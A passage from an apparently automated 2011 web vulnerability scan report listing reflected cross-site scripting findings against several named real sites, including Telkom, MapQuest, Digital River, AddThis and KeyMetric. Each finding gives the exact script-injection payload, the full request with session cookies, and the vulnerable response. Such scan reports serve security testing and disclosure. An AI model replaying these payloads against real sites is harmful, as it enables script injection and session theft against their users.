X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23327
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<title>TELKOM
...[SNIP]...
<a href="/products-servicesae525"><script>alert(1)</script>66dba90169e/index.html?&lid=id" class="blue">
...[SNIP]...
4.58. http://beta.telkom.co.id/produk-layanan/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /produk-layanan/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b1f29<script>alert(1)</script>636cefd39c0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /produk-layananb1f29<script>alert(1)</script>636cefd39c0/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.1.10.1308921355; __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:21 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23707
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<b>/produk-layananb1f29<script>alert(1)</script>636cefd39c0/index.html</b>
...[SNIP]...
4.59. http://beta.telkom.co.id/produk-layanan/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /produk-layanan/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ba9b"><script>alert(1)</script>1ab312460db was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /produk-layanan2ba9b"><script>alert(1)</script>1ab312460db/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.1.10.1308921355; __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:17 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23713
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/produk-layanan2ba9b"><script>alert(1)</script>1ab312460db/index.html?&lid=en">
...[SNIP]...
4.60. http://beta.telkom.co.id/produk-layanan/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /produk-layanan/

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 15993--><script>alert(1)</script>bc09b8de5cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /produk-layanan15993--><script>alert(1)</script>bc09b8de5cd/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.1.10.1308921355; __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:26 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23716
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/produk-layanan15993--><script>alert(1)</script>bc09b8de5cd/index.html?&lid=en">
...[SNIP]...
4.61. http://coverage.mqcdn.com/coverage [jsonp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://coverage.mqcdn.com
Path:   /coverage

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 306e8<script>alert(1)</script>cd3f1595c was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coverage?format=json&jsonp=MQA._covCallback306e8<script>alert(1)</script>cd3f1595c&loc=-96.97,32.64,-96.63,32.93&zoom=11&projection=sm&cat=map%2Chyb%2Csat HTTP/1.1
Host: coverage.mqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 14:15:23 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/3.2 Python/2.6.2
Pragma: no-cache
Cache-Control: no-cache
ntCoent-Length: 1754
Connection: close
Content-Type: text/javascript; charset=utf-8
Content-Length: 1754

MQA._covCallback306e8<script>alert(1)</script>cd3f1595c({"map": [{"opt": false, "copyrights": [{"html_short": "", "html": "", "text_short": "Intermap", "text": "Intermap", "id": "intermap", "group": "Imagery"}], "id": "map_na"}, {"opt": false, "copyrights"
...[SNIP]...
4.62. http://coverage.mqcdn.com/coverage [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://coverage.mqcdn.com
Path:   /coverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d6c3e<script>alert(1)</script>14f55be02a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coverage?format=json&jsonp=MQA._covCallback&loc=-96.97,32.64,-96.63,32.93&zoom=11&projection=sm&cat=map%2Chyb%2Csat&d6c3e<script>alert(1)</script>14f55be02a5=1 HTTP/1.1
Host: coverage.mqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 14:15:23 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/3.2 Python/2.6.2
Pragma: no-cache
Cache-Control: no-cache
ntCoent-Length: 1720
Connection: close
Content-Type: text/javascript; charset=utf-8
Content-Length: 1720

MQA._covCallback({"map": [{"opt": false, "copyrights": [{"html_short": "", "html": "", "text_short": "Intermap", "text": "Intermap", "id": "intermap", "group": "Imagery"}], "id": "map_na"}, {"opt": fa
...[SNIP]...
"text_short": "i-cubed", "text": "i-cubed", "id": "i3", "group": "Imagery"}], "id": "i3"}]},"format=json&jsonp=MQA._covCallback&loc=-96.97,32.64,-96.63,32.93&zoom=11&projection=sm&cat=map%2Chyb%2Csat&d6c3e<script>alert(1)</script>14f55be02a5=1")
4.63. http://display.digitalriver.com/ [aid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9f10'-alert(1)-'6801cde2886 was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?aid=244a9f10'-alert(1)-'6801cde2886&tax=par HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=SMB015741170000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x2767i12d29vaf31

Response

HTTP/1.1 200 OK
Date: Sat, 25 Jun 2011 02:10:55 GMT
Server: Apache/2.2.9
Expires: Sat, 25 Jun 2011 02:40:55 GMT
Last-Modified: Sat, 25 Jun 2011 02:10:55 GMT
Content-Length: 226
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244a9f10'-alert(1)-'6801cde2886&tax=par';
document.getElementsByTagName('head')[0].appendChild(dgt_script);
4.64. http://display.digitalriver.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd9b8'-alert(1)-'b4bb3b738c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?aid=244&tax=par&cd9b8'-alert(1)-'b4bb3b738c5=1 HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=SMB015741170000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x2767i12d29vaf31

Response

HTTP/1.1 200 OK
Date: Sat, 25 Jun 2011 02:10:55 GMT
Server: Apache/2.2.9
Expires: Sat, 25 Jun 2011 02:40:55 GMT
Last-Modified: Sat, 25 Jun 2011 02:10:55 GMT
Content-Length: 229
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=par&cd9b8'-alert(1)-'b4bb3b738c5=1';
document.getElementsByTagName('head')[0].appendChild(dgt_script);
4.65. http://display.digitalriver.com/ [tax parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The value of the tax request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6d7b'-alert(1)-'ca81e9e8486 was submitted in the tax parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?aid=244&tax=parf6d7b'-alert(1)-'ca81e9e8486 HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=SMB015741170000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x2767i12d29vaf31

Response

HTTP/1.1 200 OK
Date: Sat, 25 Jun 2011 02:10:55 GMT
Server: Apache/2.2.9
Expires: Sat, 25 Jun 2011 02:40:55 GMT
Last-Modified: Sat, 25 Jun 2011 02:10:55 GMT
Content-Length: 226
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=parf6d7b'-alert(1)-'ca81e9e8486';
document.getElementsByTagName('head')[0].appendChild(dgt_script);
4.66. http://drh2.img.digitalriver.com/store [CategoryID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://drh2.img.digitalriver.com
Path:   /store

Issue detail

The value of the CategoryID request parameter is copied into the HTML document as plain text between tags. The payload 3fe60<script>alert(1)</script>65e3098e1b1 was submitted in the CategoryID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /store?SiteID=ea&Locale=en_US&Action=DisplayDRProductInfo&CategoryID=88318003fe60<script>alert(1)</script>65e3098e1b1&orderBy=date+descending&size=1000&version=2&eaHideSearchResults=false&output=json&content=displayName+keywords+eaProdImageSmall+eaGenre+platform&jsonp=quicksearch HTTP/1.1
Host: drh2.img.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x2767i12d29vaf31

Response

HTTP/1.1 200 OK
Content-Type: text/javascript;charset=UTF-8
Last-Modified: Fri, 24 Jun 2011 13:45:32 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (M;max-age=86400+0;age=9;ecid=21782327991,0)
Content-Length: 72907
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app71
Access-Control-Allow-Origin: *
Cache-Control: max-age=86400
Expires: Sat, 25 Jun 2011 13:45:42 GMT
Date: Fri, 24 Jun 2011 13:45:42 GMT
Connection: close


<!-- REQUEST ID: TIME=1308923132925:NODE=c1a7103:THREAD=692 -->


/* Digital River ProductInfo Widget */
/* JSON Output */


quicksearch({productInfo:{categoryID:"88318003fe60<script>alert(1)</script>65e3098e1b1",startIndex:0,size:1000,totalSize:268,product:[{productID:229170000,displayName:"Need for Speed... The Run Limited Edition",keywords:"NFS, needforspeed, racing, cars, car, therun, race, nfstherun, nfs
...[SNIP]...
4.67. http://ds.addthis.com/red/psi/sites/www.phuket.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.phuket.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload aa9cc<script>alert(1)</script>b2413e078b1 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.phuket.com/p.json?callback=_ate.ad.hpraa9cc<script>alert(1)</script>b2413e078b1&uid=4dce8a530508b02d&url=http%3A%2F%2Fwww.phuket.com%2Fandamanwhitebeach%2F&ref=http%3A%2F%2Fwww.phuket.com%2Fislands%2Findex.htm&ypa3gm HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh45.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=%7B%222%22%3A%222814750682866683%2CrcHW803OVbgACmEf%22%7D..1308921530.3M|1308921511.3N|1308911539.1WV|1308911539.1FE|1308911539.60|1308911539.1EY|1308225884.19F|1308225884.1VV|1306359996.1OD; ssh=eJwzMjA0NDAzMrFKS0xOTcrPz9YxtM7IL8lNzMzRMQQAekUI6A%3D%3D; sshs=hotmail%2Cfacebook; bt=1308921511|00004M01000004N010; dt=X; psc=4; uid=4dce8a530508b02d

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Fri, 24 Jun 2011 13:22:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 24 Jun 2011 13:22:34 GMT
Connection: close

_ate.ad.hpraa9cc<script>alert(1)</script>b2413e078b1({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})
4.68. http://km5002.keymetric.net/KM2.js [hist parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the hist request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5708b'%3balert(1)//4f9b3d66658 was submitted in the hist parameter. This input was echoed as 5708b';alert(1)//4f9b3d66658 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=5708b'%3balert(1)//4f9b3d66658&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:32:15 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5099

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
TString() + ';path=/;' + ((cbd)?'domain='+cbd:'');
kmCookieDays = 365;
kmExt = new Date();
kmExt.setTime(kmExt.getTime() + 1000 * 60 * 60 * 24 * kmCookieDays);
document.cookie = 'kmE5002=1:0|15149,5708b';alert(1)//4f9b3d66658;expires=' + kmExt.toGMTString() + ';path=/;' + ((cbd)?'domain='+cbd:'');
kmLat = new Date();
kmLat.setTime(kmLat.getTime() + 1000 * 60 * 60 * 24 * kmCookieDays);
document.cookie = 'kmL5002=1|1|Camp
...[SNIP]...
4.69. http://km5002.keymetric.net/KM2.js [lag parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lag request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8458'%3balert(1)//a36ce79db04 was submitted in the lag parameter. This input was echoed as a8458';alert(1)//a36ce79db04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=a8458'%3balert(1)//a36ce79db04&lc1=&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:32:00 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5095

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
':
val = '0'; break;
case 'cpca':
val = 'Campaign not provided'; break;
case 'kmca':
val = 'Campaign not provided'; break;
case 'cpag':
val = 'a8458';alert(1)//a36ce79db04'; break;
case 'kmag':
val = 'a8458';alert(1)//a36ce79db04'; break;
case 'kw':
val = 'Keyword not provided'; break;
case 'kmkw':
val = 'Keyword not provi
...[SNIP]...
4.70. http://km5002.keymetric.net/KM2.js [las parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the las request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f274'%3balert(1)//058ce2b81c7 was submitted in the las parameter. This input was echoed as 1f274';alert(1)//058ce2b81c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=11f274'%3balert(1)//058ce2b81c7&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:45 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5099

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
5149,;expires=' + kmExt.toGMTString() + ';path=/;' + ((cbd)?'domain='+cbd:'');
kmLat = new Date();
kmLat.setTime(kmLat.getTime() + 1000 * 60 * 60 * 24 * kmCookieDays);
document.cookie = 'kmL5002=1|11f274';alert(1)//058ce2b81c7|Campaign not provided|AdGroup not provided|Keyword not provided|unk|Referrer information not available|Raw Query not available;expires=' + kmLat.toGMTString() + ';path=/;' + ((cbd)?'domain='+cbd:'');
...[SNIP]...
4.71. http://km5002.keymetric.net/KM2.js [lc1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lc1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95c71'%3balert(1)//e91e1825f03 was submitted in the lc1 parameter. This input was echoed as 95c71';alert(1)//e91e1825f03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=95c71'%3balert(1)//e91e1825f03&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
